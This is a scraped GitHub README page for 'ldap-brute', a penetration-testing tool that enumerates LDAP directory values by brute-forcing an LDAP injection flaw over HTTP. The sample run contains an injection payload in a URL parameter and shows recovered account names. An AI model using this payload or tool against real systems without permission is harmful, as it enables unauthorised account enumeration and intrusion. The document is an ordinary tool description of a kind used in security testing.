Skip to content
/ ldap-brute Public

A semi fast tool to bruteforce values of LDAP injections over HTTP.

License

GPL-3.0 license
14 stars 12 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

SamJoan/ldap-brute

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

21 Commits
lib
lib
 
 
wordlists
wordlists
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
ldap_brute.py
ldap_brute.py
 
 
requirements.txt
requirements.txt
 
 
test_ldap.py
test_ldap.py
 
 

Repository files navigation

Ldap dumper is a semi-fast tool to bruteforce unescaped user-input concatenations to LDAP filters over HTTP parameters.

Installation.

git clone git@github.com:droope/ldap-brute.git
cd ldap-brute/
pip install -r requirements.txt

Sample run.

LMint-PC ldap-dumper # python ldap-dumper.py 'http://vulnerable/ldap/example2.php?name=%s)(cn=*))%%00&password=' 'AUTHENTICATED as'
INFO - Entering wildcard brute mode for URL 'http://vulnerable/ldap/example2.php?name=%s)(cn=*))%%00&password='.
INFO - Valid initial values found: ['a', 'h']
50...
100...
150...
200...
250...
300...
350...
400...
450...
Valid values found (2.918s total time, 468 total HTTP requests):

admin2
hacker

Usage.

Please call python ldap-brute.py --help for more information, including examples.

Contribute.

Feel free to submit pull requests. You can run the tests with

python -m unittest discover

About

A semi fast tool to bruteforce values of LDAP injections over HTTP.

Resources

Readme

License

GPL-3.0 license
Activity

Stars

14 stars

Watchers

2 watching

Forks

12 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors 2

  •  
  •  

Languages